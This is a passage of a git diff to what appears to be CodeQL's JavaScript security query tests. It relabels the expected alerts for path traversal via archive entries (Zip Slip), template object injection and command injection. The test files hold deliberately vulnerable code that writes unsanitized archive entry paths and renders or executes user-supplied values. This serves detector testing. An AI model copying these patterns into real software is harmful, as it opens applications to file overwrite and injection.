operation | +| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:23:28:23:35 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:23:28:23:35 | fileName | file system operation | +| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:31:26:31:29 | name | file system operation | +| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:35:26:35:29 | name | file system operation | +| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | file system operation | +edges +| ZipSlipBad2.js:5:9:5:46 | fileName | ZipSlipBad2.js:6:22:6:29 | fileName | provenance | | +| ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | ZipSlipBad2.js:5:9:5:46 | fileName | provenance | | +| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | provenance | Config | +| ZipSlipBad.js:7:11:7:31 | fileName | ZipSlipBad.js:8:37:8:44 | fileName | provenance | | +| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:11:7:31 | fileName | provenance | | +| ZipSlipBad.js:15:11:15:31 | fileName | ZipSlipBad.js:16:30:16:37 | fileName | provenance | | +| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:11:15:31 | fileName | provenance | | +| ZipSlipBad.js:22:11:22:31 | fileName | ZipSlipBad.js:23:28:23:35 | fileName | provenance | | +| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:11:22:31 | fileName | provenance | | +| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | provenance | | +| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | provenance | | +| ZipSlipBadUnzipper.js:7:9:7:29 | fileName | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | provenance | | +| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:9:7:29 | fileName | provenance | | nodes | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | semmle.label | zipEntry.entryName | | TarSlipBad.js:6:36:6:46 | header.name | semmle.label | header.name | @@ -22,29 +47,4 @@ nodes | ZipSlipBadUnzipper.js:7:9:7:29 | fileName | semmle.label | fileName | | ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | semmle.label | entry.path | | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | semmle.label | fileName | -edges -| ZipSlipBad2.js:5:9:5:46 | fileName | ZipSlipBad2.js:6:22:6:29 | fileName | provenance | | -| ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | ZipSlipBad2.js:5:9:5:46 | fileName | provenance | | -| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | provenance | Config | -| ZipSlipBad.js:7:11:7:31 | fileName | ZipSlipBad.js:8:37:8:44 | fileName | provenance | | -| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:11:7:31 | fileName | provenance | | -| ZipSlipBad.js:15:11:15:31 | fileName | ZipSlipBad.js:16:30:16:37 | fileName | provenance | | -| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:11:15:31 | fileName | provenance | | -| ZipSlipBad.js:22:11:22:31 | fileName | ZipSlipBad.js:23:28:23:35 | fileName | provenance | | -| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:11:22:31 | fileName | provenance | | -| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | provenance | | -| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | provenance | | -| ZipSlipBadUnzipper.js:7:9:7:29 | fileName | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | provenance | | -| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:9:7:29 | fileName | provenance | | subpaths -#select -| AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | Unsanitized archive entry, which may contain '..', is used in a $@. | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | file system operation | -| TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:6:36:6:46 | header.name | file system operation | -| TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:9:17:9:31 | header.linkname | file system operation | -| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:6:22:6:29 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad2.js:6:22:6:29 | fileName | file system operation | -| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:8:37:8:44 | fileName | file system operation | -| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:16:30:16:37 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:16:30:16:37 | fileName | file system operation | -| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:23:28:23:35 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:23:28:23:35 | fileName | file system operation | -| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:31:26:31:29 | name | file system operation | -| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:35:26:35:29 | name | file system operation | -| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | file system operation | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref index 0ac6382f48ab..921be7872bbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref @@ -1 +1,2 @@ -Security/CWE-022/ZipSlip.ql +query: Security/CWE-022/ZipSlip.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index 0146533c6dca..e7ad3b8e264d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js @@ -4,35 +4,35 @@ const unzip = require('unzip'); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { - const fileName = entry.path; - entry.pipe(fs.createWriteStream(fileName)); + const fileName = entry.path; // $ Alert + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); var Writer = require('fstream').Writer; fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { - const fileName = entry.path; - entry.pipe(Writer({path: fileName})); + const fileName = entry.path; // $ Alert + entry.pipe(Writer({path: fileName})); // $ Sink }); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { - const fileName = entry.path; - var file = fs.openSync(fileName, "w"); + const fileName = entry.path; // $ Alert + var file = fs.openSync(fileName, "w"); // $ Sink }); const JSZip = require('jszip'); const zip = new JSZip(); const path = require('path'); function doZipSlip() { - for (const name in zip.files) { - fs.createWriteStream(name); + for (const name in zip.files) { // $ Alert + fs.createWriteStream(name); // $ Sink } - zip.forEach((name, file) => { - fs.createWriteStream(name); + zip.forEach((name, file) => { // $ Alert + fs.createWriteStream(name); // $ Sink }); const extractTo = path.resolve("/some/path/to/extract/to"); @@ -50,6 +50,6 @@ function doZipSlip() { files.push(name); } for (const file of files) { - fs.createWriteStream(path.join(extractTo, file)); // OK + fs.createWriteStream(path.join(extractTo, file)); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js index d582c680ef8e..7c110ea95aa1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js @@ -2,7 +2,7 @@ var fs = require('fs'); var unzip = require('unzip'); fs.readFile('path/to/archive.zip', function (err, zipContents) { unzip.Parse(zipContents).on('entry', function (entry) { - var fileName = 'output/path/' + entry.path; - fs.writeFileSync(fileName, entry.contents); + var fileName = 'output/path/' + entry.path; // $ Alert + fs.writeFileSync(fileName, entry.contents); // $ Sink }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js index 239b3df895d5..064bc58e25a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js @@ -4,6 +4,6 @@ const unzipper = require('unzipper'); fs.createReadStream('path/to/archive.zip') .pipe(unzipper.Parse()) .on('entry', function (entry) { - var fileName = entry.path; - entry.pipe(fs.createWriteStream(fileName)); + var fileName = entry.path; // $ Alert + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js index 07918647e6f0..45e4ced8380b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js @@ -26,7 +26,7 @@ fs.createReadStream('archive.zip') } if (!fileName.startsWith(".")) { - entry.pipe(fs.createWriteStream(fileName)); // OK. + entry.pipe(fs.createWriteStream(fileName)); } }); @@ -35,5 +35,5 @@ fs.createReadStream('archive.zip') .on('entry', entry => { const fileName = path.normalize(entry.path); - entry.pipe(fs.createWriteStream(path.basename(fileName))); // OK. + entry.pipe(fs.createWriteStream(path.basename(fileName))); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql deleted file mode 100644 index eae82dc052fe..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TemplateObjectInjectionQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected index 8be388d5ad97..32b2875a86cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected @@ -1,3 +1,43 @@ +#select +| routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | Template object depends on a $@. | routes.js:2:23:2:30 | req.body | user-provided value | +| tst2.js:7:28:7:40 | bodyParameter | tst2.js:6:25:6:32 | req.body | tst2.js:7:28:7:40 | bodyParameter | Template object depends on a $@. | tst2.js:6:25:6:32 | req.body | user-provided value | +| tst2.js:27:28:27:40 | bodyParameter | tst2.js:26:25:26:32 | req.body | tst2.js:27:28:27:40 | bodyParameter | Template object depends on a $@. | tst2.js:26:25:26:32 | req.body | user-provided value | +| tst2.js:35:28:35:40 | bodyParameter | tst2.js:34:25:34:32 | req.body | tst2.js:35:28:35:40 | bodyParameter | Template object depends on a $@. | tst2.js:34:25:34:32 | req.body | user-provided value | +| tst2.js:43:28:43:40 | bodyParameter | tst2.js:42:25:42:32 | req.body | tst2.js:43:28:43:40 | bodyParameter | Template object depends on a $@. | tst2.js:42:25:42:32 | req.body | user-provided value | +| tst2.js:52:28:52:40 | bodyParameter | tst2.js:51:25:51:32 | req.body | tst2.js:52:28:52:40 | bodyParameter | Template object depends on a $@. | tst2.js:51:25:51:32 | req.body | user-provided value | +| tst.js:10:28:10:40 | bodyParameter | tst.js:7:25:7:32 | req.body | tst.js:10:28:10:40 | bodyParameter | Template object depends on a $@. | tst.js:7:25:7:32 | req.body | user-provided value | +| tst.js:11:28:11:41 | queryParameter | tst.js:8:26:8:49 | req.que ... rameter | tst.js:11:28:11:41 | queryParameter | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | +| tst.js:24:28:24:30 | obj | tst.js:8:26:8:49 | req.que ... rameter | tst.js:24:28:24:30 | obj | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | +| tst.js:29:28:29:42 | JSON.parse(str) | tst.js:8:26:8:49 | req.que ... rameter | tst.js:29:28:29:42 | JSON.parse(str) | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | +edges +| tst2.js:6:9:6:46 | bodyParameter | tst2.js:7:28:7:40 | bodyParameter | provenance | | +| tst2.js:6:25:6:32 | req.body | tst2.js:6:25:6:46 | req.bod ... rameter | provenance | Config | +| tst2.js:6:25:6:46 | req.bod ... rameter | tst2.js:6:9:6:46 | bodyParameter | provenance | | +| tst2.js:26:9:26:46 | bodyParameter | tst2.js:27:28:27:40 | bodyParameter | provenance | | +| tst2.js:26:25:26:32 | req.body | tst2.js:26:25:26:46 | req.bod ... rameter | provenance | Config | +| tst2.js:26:25:26:46 | req.bod ... rameter | tst2.js:26:9:26:46 | bodyParameter | provenance | | +| tst2.js:34:9:34:46 | bodyParameter | tst2.js:35:28:35:40 | bodyParameter | provenance | | +| tst2.js:34:25:34:32 | req.body | tst2.js:34:25:34:46 | req.bod ... rameter | provenance | Config | +| tst2.js:34:25:34:46 | req.bod ... rameter | tst2.js:34:9:34:46 | bodyParameter | provenance | | +| tst2.js:42:9:42:46 | bodyParameter | tst2.js:43:28:43:40 | bodyParameter | provenance | | +| tst2.js:42:25:42:32 | req.body | tst2.js:42:25:42:46 | req.bod ... rameter | provenance | Config | +| tst2.js:42:25:42:46 | req.bod ... rameter | tst2.js:42:9:42:46 | bodyParameter | provenance | | +| tst2.js:51:9:51:46 | bodyParameter | tst2.js:52:28:52:40 | bodyParameter | provenance | | +| tst2.js:51:25:51:32 | req.body | tst2.js:51:25:51:46 | req.bod ... rameter | provenance | Config | +| tst2.js:51:25:51:46 | req.bod ... rameter | tst2.js:51:9:51:46 | bodyParameter | provenance | | +| tst.js:7:9:7:46 | bodyParameter | tst.js:10:28:10:40 | bodyParameter | provenance | | +| tst.js:7:25:7:32 | req.body | tst.js:7:25:7:46 | req.bod ... rameter | provenance | Config | +| tst.js:7:25:7:46 | req.bod ... rameter | tst.js:7:9:7:46 | bodyParameter | provenance | | +| tst.js:8:9:8:49 | queryParameter | tst.js:11:28:11:41 | queryParameter | provenance | | +| tst.js:8:9:8:49 | queryParameter | tst.js:20:19:20:32 | queryParameter | provenance | | +| tst.js:8:26:8:49 | req.que ... rameter | tst.js:8:9:8:49 | queryParameter | provenance | | +| tst.js:20:19:20:32 | queryParameter | tst.js:23:24:23:26 | obj | provenance | | +| tst.js:23:24:23:26 | obj | tst.js:24:28:24:30 | obj | provenance | | +| tst.js:23:24:23:26 | obj | tst.js:26:17:26:19 | obj | provenance | | +| tst.js:26:11:26:24 | str | tst.js:29:39:29:41 | str | provenance | | +| tst.js:26:17:26:19 | obj | tst.js:26:17:26:24 | obj + "" | provenance | Config | +| tst.js:26:17:26:24 | obj + "" | tst.js:26:11:26:24 | str | provenance | | +| tst.js:29:39:29:41 | str | tst.js:29:28:29:42 | JSON.parse(str) | provenance | Config | nodes | routes.js:2:23:2:30 | req.body | semmle.label | req.body | | tst2.js:6:9:6:46 | bodyParameter | semmle.label | bodyParameter | @@ -35,44 +75,4 @@ nodes | tst.js:26:17:26:24 | obj + "" | semmle.label | obj + "" | | tst.js:29:28:29:42 | JSON.parse(str) | semmle.label | JSON.parse(str) | | tst.js:29:39:29:41 | str | semmle.label | str | -edges -| tst2.js:6:9:6:46 | bodyParameter | tst2.js:7:28:7:40 | bodyParameter | provenance | | -| tst2.js:6:25:6:32 | req.body | tst2.js:6:25:6:46 | req.bod ... rameter | provenance | Config | -| tst2.js:6:25:6:46 | req.bod ... rameter | tst2.js:6:9:6:46 | bodyParameter | provenance | | -| tst2.js:26:9:26:46 | bodyParameter | tst2.js:27:28:27:40 | bodyParameter | provenance | | -| tst2.js:26:25:26:32 | req.body | tst2.js:26:25:26:46 | req.bod ... rameter | provenance | Config | -| tst2.js:26:25:26:46 | req.bod ... rameter | tst2.js:26:9:26:46 | bodyParameter | provenance | | -| tst2.js:34:9:34:46 | bodyParameter | tst2.js:35:28:35:40 | bodyParameter | provenance | | -| tst2.js:34:25:34:32 | req.body | tst2.js:34:25:34:46 | req.bod ... rameter | provenance | Config | -| tst2.js:34:25:34:46 | req.bod ... rameter | tst2.js:34:9:34:46 | bodyParameter | provenance | | -| tst2.js:42:9:42:46 | bodyParameter | tst2.js:43:28:43:40 | bodyParameter | provenance | | -| tst2.js:42:25:42:32 | req.body | tst2.js:42:25:42:46 | req.bod ... rameter | provenance | Config | -| tst2.js:42:25:42:46 | req.bod ... rameter | tst2.js:42:9:42:46 | bodyParameter | provenance | | -| tst2.js:51:9:51:46 | bodyParameter | tst2.js:52:28:52:40 | bodyParameter | provenance | | -| tst2.js:51:25:51:32 | req.body | tst2.js:51:25:51:46 | req.bod ... rameter | provenance | Config | -| tst2.js:51:25:51:46 | req.bod ... rameter | tst2.js:51:9:51:46 | bodyParameter | provenance | | -| tst.js:7:9:7:46 | bodyParameter | tst.js:10:28:10:40 | bodyParameter | provenance | | -| tst.js:7:25:7:32 | req.body | tst.js:7:25:7:46 | req.bod ... rameter | provenance | Config | -| tst.js:7:25:7:46 | req.bod ... rameter | tst.js:7:9:7:46 | bodyParameter | provenance | | -| tst.js:8:9:8:49 | queryParameter | tst.js:11:28:11:41 | queryParameter | provenance | | -| tst.js:8:9:8:49 | queryParameter | tst.js:20:19:20:32 | queryParameter | provenance | | -| tst.js:8:26:8:49 | req.que ... rameter | tst.js:8:9:8:49 | queryParameter | provenance | | -| tst.js:20:19:20:32 | queryParameter | tst.js:23:24:23:26 | obj | provenance | | -| tst.js:23:24:23:26 | obj | tst.js:24:28:24:30 | obj | provenance | | -| tst.js:23:24:23:26 | obj | tst.js:26:17:26:19 | obj | provenance | | -| tst.js:26:11:26:24 | str | tst.js:29:39:29:41 | str | provenance | | -| tst.js:26:17:26:19 | obj | tst.js:26:17:26:24 | obj + "" | provenance | Config | -| tst.js:26:17:26:24 | obj + "" | tst.js:26:11:26:24 | str | provenance | | -| tst.js:29:39:29:41 | str | tst.js:29:28:29:42 | JSON.parse(str) | provenance | Config | subpaths -#select -| routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | Template object depends on a $@. | routes.js:2:23:2:30 | req.body | user-provided value | -| tst2.js:7:28:7:40 | bodyParameter | tst2.js:6:25:6:32 | req.body | tst2.js:7:28:7:40 | bodyParameter | Template object depends on a $@. | tst2.js:6:25:6:32 | req.body | user-provided value | -| tst2.js:27:28:27:40 | bodyParameter | tst2.js:26:25:26:32 | req.body | tst2.js:27:28:27:40 | bodyParameter | Template object depends on a $@. | tst2.js:26:25:26:32 | req.body | user-provided value | -| tst2.js:35:28:35:40 | bodyParameter | tst2.js:34:25:34:32 | req.body | tst2.js:35:28:35:40 | bodyParameter | Template object depends on a $@. | tst2.js:34:25:34:32 | req.body | user-provided value | -| tst2.js:43:28:43:40 | bodyParameter | tst2.js:42:25:42:32 | req.body | tst2.js:43:28:43:40 | bodyParameter | Template object depends on a $@. | tst2.js:42:25:42:32 | req.body | user-provided value | -| tst2.js:52:28:52:40 | bodyParameter | tst2.js:51:25:51:32 | req.body | tst2.js:52:28:52:40 | bodyParameter | Template object depends on a $@. | tst2.js:51:25:51:32 | req.body | user-provided value | -| tst.js:10:28:10:40 | bodyParameter | tst.js:7:25:7:32 | req.body | tst.js:10:28:10:40 | bodyParameter | Template object depends on a $@. | tst.js:7:25:7:32 | req.body | user-provided value | -| tst.js:11:28:11:41 | queryParameter | tst.js:8:26:8:49 | req.que ... rameter | tst.js:11:28:11:41 | queryParameter | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | -| tst.js:24:28:24:30 | obj | tst.js:8:26:8:49 | req.que ... rameter | tst.js:24:28:24:30 | obj | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | -| tst.js:29:28:29:42 | JSON.parse(str) | tst.js:8:26:8:49 | req.que ... rameter | tst.js:29:28:29:42 | JSON.parse(str) | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref index 28d1b81c5d40..a6487dea1574 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref @@ -1 +1,2 @@ -Security/CWE-073/TemplateObjectInjection.ql +query: Security/CWE-073/TemplateObjectInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-073/routes.js b/javascript/ql/test/query-tests/Security/CWE-073/routes.js index 2bfbad7cd37b..07e03fc0f404 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/routes.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/routes.js @@ -1,3 +1,3 @@ exports.foo = function(req, res) { - res.render('foo', req.body); // NOT OK + res.render('foo', req.body); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index ee2bff5f0e78..04422c253a0c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js @@ -4,29 +4,29 @@ app.set('view engine', 'hbs'); app.use(require('body-parser').json()); app.use(require('body-parser').urlencoded({ extended: false })); app.post('/path', function(req, res) { - var bodyParameter = req.body.bodyParameter; - var queryParameter = req.query.queryParameter; + var bodyParameter = req.body.bodyParameter; // $ Source + var queryParameter = req.query.queryParameter; // $ Source - res.render('template', bodyParameter); // NOT OK - res.render('template', queryParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert + res.render('template', queryParameter); // $ Alert if (typeof bodyParameter === "string") { - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); } - res.render('template', queryParameter + ""); // OK + res.render('template', queryParameter + ""); - res.render('template', {profile: bodyParameter}); // OK + res.render('template', {profile: bodyParameter}); indirect(res, queryParameter); }); function indirect(res, obj) { - res.render("template", obj); // NOT OK + res.render("template", obj); // $ Alert const str = obj + ""; - res.render("template", str); // OK + res.render("template", str); - res.render("template", JSON.parse(str)); // NOT OK + res.render("template", JSON.parse(str)); // $ Alert } let routes = require('./routes'); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 6cb626fd7c1c..5e0168f0707c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js @@ -3,44 +3,44 @@ var app = require('express')(); app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); var app2 = require('express')(); app2.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app3 = require('express')(); app3.set('view engine', 'pug'); app3.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); var app5 = require('express')(); app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); var app6 = require('express')(); app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); const express = require('express'); @@ -48,7 +48,7 @@ var router = express.Router(); var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected index e8d95064b8e1..b68d40a540dd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected @@ -1,3 +1,55 @@ +#select +| actions.js:9:8:9:22 | `echo ${title}` | actions.js:8:17:8:57 | github. ... t.title | actions.js:9:8:9:22 | `echo ${title}` | This command line depends on a $@. | actions.js:8:17:8:57 | github. ... t.title | user-provided value | +| actions.js:19:14:19:31 | `echo ${head_ref}` | actions.js:18:20:18:63 | github. ... ead.ref | actions.js:19:14:19:31 | `echo ${head_ref}` | This command line depends on a $@. | actions.js:18:20:18:63 | github. ... ead.ref | user-provided value | +| child_process-test.js:17:13:17:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:17:13:17:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:18:17:18:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:18:17:18:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:19:17:19:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:19:17:19:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:20:21:20:23 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:20:21:20:23 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:21:14:21:16 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:21:14:21:16 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:22:18:22:20 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:22:18:22:20 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:23:13:23:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:23:13:23:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | child_process-test.js:6:25:6:31 | req.url | 